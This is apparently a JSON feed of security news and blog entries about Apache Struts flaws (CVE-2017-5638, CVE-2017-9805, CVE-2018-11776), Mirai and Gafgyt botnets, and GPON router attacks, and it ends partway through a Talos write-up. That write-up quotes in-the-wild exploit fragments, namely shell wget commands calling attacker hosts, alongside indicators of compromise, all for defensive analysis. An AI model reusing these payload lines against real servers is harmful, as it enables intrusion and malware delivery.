"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:51:10", "bulletinFamily": "info", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from &lt;HTTP_SERVER&gt;, saves it to &lt;FILE_LOCATION&gt;, and installs the update. After that, the botnet launches a Blacknurse DDoS attack, an attack that involves ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Ruchna told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of new targeted vuln comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "modified": "2018-09-10T14:23:09", "published": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:55", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "modified": "2017-09-15T10:00:54", "published": "2017-09-13T21:38:00", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T19:31:29", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n\n\n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. \n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n\n\n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder &amp; VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[](<https://1.bp.blogspot.com/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. \n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[](<https://1.bp.blogspot.com/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "modified": "2018-08-23T18:30:56", "published": "2018-08-22T14:04:00", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": "https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:55", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-_apYSKyOUKo/Wbe7DDGoMfI/AAAAAAAAC0o/yPE-wNpS2n83-GU6fD28_WevBKtwhDX1gCLcBGAs/s1600/apache-struts-cisco.jpg>)\n\nAfter [Equifax massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that was believed to be caused due to [a vulnerability in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>), Cisco has initiated an investigation into its products that incorporate a version of the popular Apache Struts2 web application framework. \n \nApache Struts is a free, open-source MVC framework for developing web applications in the Java programming language, and used by 65 percent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nHowever, the popular open-source software package was recently found affected by multiple vulnerabilities, including two remote code execution vulnerabilities\u2014one discovered earlier this month, and another in March\u2014one of which is [believed to be used](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) to breach personal data of over [143 million Equifax users](<https://thehackernews.com/2017/09/equifax-data-breach.html>). \n \nSome of Cisco products including its Digital Media Manager, MXE 3500 Series Media Experience Engines, Network Performance Analysis, Hosted Collaboration Solution for Contact Center, and Unified Contact Center Enterprise have been found vulnerable to multiple Apache Struts flaws. \n \n\n\n### Cisco Launches Apache Struts Vulnerability Hunting\n\n \nCisco is also testing rest of its products against four newly discovered security vulnerability in Apache Struts2, including the one (CVE-2017-9805) [we reported on September 5](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) and the remaining three also disclosed last week. \n \nHowever, the remote code execution bug (CVE-2017-5638) that was [actively exploited back in March](<https://thehackernews.com/2017/03/apache-struts-framework.html>) this year is not included by the company in its recent security audit. \n \nThe three vulnerabilities\u2014CVE-2017-9793, CVE-2017-9804 and CVE-2017-9805\u2014included in the [Cisco security audit](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2>) was released by the Apache Software Foundation on 5th September with the release of Apache Struts 2.5.13 which patched the issues. \n \nThe fourth vulnerability (CVE-2017-12611) that is being [investigated by Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170909-struts2-rce>) was released on 7th September with the release of Apache Struts 2.3.34 that fixed the flaw that resided in the Freemarker tag functionality of the Apache Struts2 package and could allow an unauthenticated, remote attacker to execute malicious code on an affected system. \n \n\n\n### Apache Struts Flaw Actively Exploited to Hack Servers &amp; Deliver Malware\n\n \nComing on to the most severe of all, CVE-2017-9805 (assigned as critical) is a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them. \n \nThis could allow a remote, unauthenticated attacker to achieve remote code execution on a host running a vulnerable version of Apache Struts2, and Cisco's Threat intelligence firm Talos has [observed](<http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html>) that this flaw is [under active exploitation](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) to find vulnerable servers. \n \nSecurity researchers from data centre security vendor Imperva recently [detected](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) and blocked thousands of attacks attempting to exploit this Apache Struts2 vulnerability (CVE-2017-9805), with roughly 80 percent of them tried to deliver a malicious payload. \n \nThe majority of attacks originated from China with a single Chinese IP address registered to a Chinese e-commerce company sending out more than 40% of all the requests. Attacks also came from Australia, the U.S., Brazil, Canada, Russia and various parts of Europe. \n \nOut of the two remaining flaws, one (CVE-2017-9793) is again a vulnerability in the REST plug-in for Apache Struts that manifests due to \"insufficient validation of user-supplied input by the XStream library in the REST plug-in for the affected application.\" \n \nThis flaw has been given a Medium severity and could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on targeted systems. \n \nThe last flaw (CVE-2017-9804) also allows an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system but resides in the URLValidator feature of Apache Struts. \n \nCisco is testing its products against these vulnerabilities including its WebEx Meetings Server, the Data Center Network Manager, Identity Services Engine (ISE), MXE 3500 Series Media Experience Engines, several Cisco Prime products, some products for voice and unified communications, as well as video and streaming services. \n \nAt the current, there are no software patches to address the vulnerabilities in Cisco products, but the company promised to release updates for affected software which will soon be accessible through the [Cisco Bug Search Tool](<https://bst.cloudapps.cisco.com/bugsearch/bug/BUGID>). \n \nSince the framework is being widely used by a majority of top 100 fortune companies, they should also check their infrastructures against these vulnerabilities that incorporate a version of Apache Struts2.\n", "modified": "2017-09-12T10:51:16", "published": "2017-09-11T23:50:00", "id": "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "href": "https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html", "type": "thn", "title": "Apache Struts 2 Flaws Affect Multiple Cisco Products", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:56", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-FaVOI33zhVo/Wa7tX3RO_oI/AAAAAAAAuSA/pvKz2qxYH9weyv9C_HBcEOR5P901cjkngCLcBGAs/s1600/apache-struts-vulnerability.png>)\n\nSecurity researchers have [discovered](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) a critical remote code execution vulnerability in the popular Apache Struts web application framework, allowing a remote attacker to run malicious code on the affected servers. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for developing web applications in the Java programming language, which supports REST, AJAX, and JSON. \n \nThe vulnerability (CVE-2017-9805) is a programming blunder that resides in the way Struts processes data from an untrusted source. Specifically, Struts REST plugin fails to handle XML payloads while deserializing them properly. \n \nAll versions of Apache Struts since 2008 (Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12) are affected, leaving all web applications using the framework\u2019s REST plugin vulnerable to remote attackers. \n \nAccording to one of the security researchers at LGTM, who [discovered](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>) this flaw, the Struts framework is being used by \"an incredibly large number and variety of organisations,\" including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \n\"On top of that, [the vulnerability] is incredibly easy for an attacker to exploit this weakness: all you need is a web browser,\" Man Yue Mo, an LGTM security researcher said. \n \nAll an attacker needs is to submit a malicious XML code in a particular format to trigger the vulnerability on the targeted server. \n \nSuccessful exploitation of the vulnerability could allow an attacker to take full control of the affected server, eventually letting the attacker infiltrate into other systems on the same network. \n \nMo said this flaw is an unsafe deserialization in Java similar to a vulnerability in Apache Commons Collections, [discovered](<https://frohoff.github.io/appseccali-marshalling-pickles/>) by Chris Frohoff and Gabriel Lawrence in 2015 that also allowed arbitrary code execution. \n \nMany Java applications have since been affected by multiple similar vulnerabilities in recent years. \n \nSince this vulnerability has been patched in [Struts version 2.5.13](<https://struts.apache.org/docs/s2-052.html>), administrators are strongly advised to upgrade their Apache Struts installation as soon as possible. \n \nMore technical details about the vulnerability and proof-of-concept have not been published by the researchers yet, giving admins enough time to upgrade their systems.\n", "modified": "2017-09-06T10:53:09", "published": "2017-09-05T07:40:00", "id": "THN:460709FF530ED7F35B5817A55F1BF2C6", "href": "https://thehackernews.com/2017/09/apache-struts-vulnerability.html", "type": "thn", "title": "Critical Flaw in Apache Struts2 Lets Hackers Take Over Web Servers", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-05-23T10:11:26", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-6LBdTvZc_IU/WwUw6YS50dI/AAAAAAAAwx0/z1pWc8lu8pg7HWP0gzpDML9U6g0ZLy97gCLcBGAs/s728-e7/hacking-gpon-router-exploit.png>)\n\nEven after being aware of various active cyber attacks against the GPON Wi-Fi routers, if you haven't yet taken them off the Internet, then be careful\u2014because a new botnet has joined the GPON party, which is exploiting an undisclosed zero-day vulnerability in the wild. \n \nSecurity researchers from Qihoo 360 Netlab have [warned](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-iv-themoon-botnet-join-in-with-a-0day/>) of at least one botnet operator exploiting a new zero-day vulnerability in the Gigabit-capable Passive Optical Network (GPON) routers, manufactured by South Korea-based DASAN Zhone Solutions. \n \nThe botnet, dubbed TheMoon, which was first seen in 2014 and has added at least 6 IoT device exploits to its successor versions since 2017, now exploits a newly undisclosed zero-day flaw for Dasan GPON routers. \n\n\n \nNetlab researchers successfully tested the new attack payload on two different versions of GPON home router, though they didn't disclose details of the payload or release any further details of the new zero-day vulnerability to prevent more attacks. \n \nTheMoon botnet gained headlines in the year 2015-16 after it was found spreading malware to a large number of ASUS and Linksys router models using remote code execution (RCE) vulnerabilities. \n \n\n\n### Other Botnets Targeting GPON Routers\n\n[](<https://1.bp.blogspot.com/-iX9H-7NcQyY/WwUsk-D6ekI/AAAAAAAAwxo/wHpQsoEKUgcyAOvNuJtgyzqbiY-IuqbkwCLcBGAs/s728-e7/hacking-gpon-router-exploit.png>)\n\nEarlier this month, at least five different botnets were found exploiting [two critical vulnerabilities in GPON](<https://thehackernews.com/2018/05/protect-router-hacking.html>) home routers disclosed last month that eventually allow remote attackers to take full control of the device. \n \nAs detailed in our previous post, the [5 botnet families](<https://thehackernews.com/2018/05/botnet-malware-hacking.html>), including Mettle, Muhstik, [Mirai](<https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html>), [Hajime](<https://thehackernews.com/2017/04/vigilante-hacker-iot-botnet_26.html>), and [Satori](<https://thehackernews.com/2017/12/satori-mirai-iot-botnet.html>), have been found exploiting an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws in GPON routers. \n \nShortly after the details of the vulnerabilities went public, a working proof-of-concept (PoC) exploit for GPON router vulnerabilities made available to the public, making its exploitation easier for even unskilled hackers. \n \nIn separate research, Trend Micro researchers [spotted](<https://blog.trendmicro.com/trendlabs-security-intelligence/gpon-vulnerabilities-exploited-for-mexico-based-mirai-like-scanning-activities/>) Mirai-like scanning activity in Mexico, targeting GPON routers that use default usernames and passwords. \n\n\n \n\n\n> \"Unlike the previous activity, the targets for this new scanning procedure are distributed,\" Trend Micro researchers said. \"However, based on the username and password combinations we found in our data, we concluded that the target devices still consist of home routers or IP cameras that use default passwords.\"\n\n \n\n\n### How to Protect Your Wi-Fi Router From Hacking\n\n \nThe previously disclosed two GPON vulnerabilities had already been reported to DASAN, but the company hasn't yet released any fix, leaving millions of their customers open to these botnet operators. \n \nSo, until the router manufacturer releases an official patch, users can protect their devices by disabling remote administration rights and using a firewall to prevent outside access from the public Internet. \n \nMaking these changes to your vulnerable routers would restrict access to the local network only, within the range of your Wi-Fi network, thus effectively reducing the attack surface by eliminating remote attackers. \n \nWe will update this article with new details, as soon as they are available. Stay Tuned!\n", "modified": "2018-05-23T09:15:00", "published": "2018-05-23T09:15:00", "id": "THN:66C2DBEE768691DF8BF72CAE39867B68", "href": "https://thehackernews.com/2018/05/hacking-gpon-routers.html", "type": "thn", "title": "Hackers are exploiting a new zero-day flaw in GPON routers", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2017-09-08T17:15:47", "bulletinFamily": "blog", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>,&nbsp;Talos&nbsp;responded&nbsp;to&nbsp;a&nbsp;zero-day&nbsp;vulnerability that&nbsp;was under active exploitation in&nbsp;the&nbsp;wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\">&lt;string&gt;/bin/sh&lt;/string&gt;&lt;string&gt;-c&lt;/string&gt;&lt;string&gt;wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite&lt;/string&gt;</blockquote>This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\">&lt;string&gt;/bin/sh&lt;/string&gt;&lt;string&gt;-c&lt;/string&gt;&lt;string&gt;wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`&lt;/string&gt;</blockquote>During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\">&lt;string&gt;wget&lt;/string&gt;&lt;string&gt;hxxp://st2buzgajl.alifuzz[.]com/052&lt;/string&gt;</blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 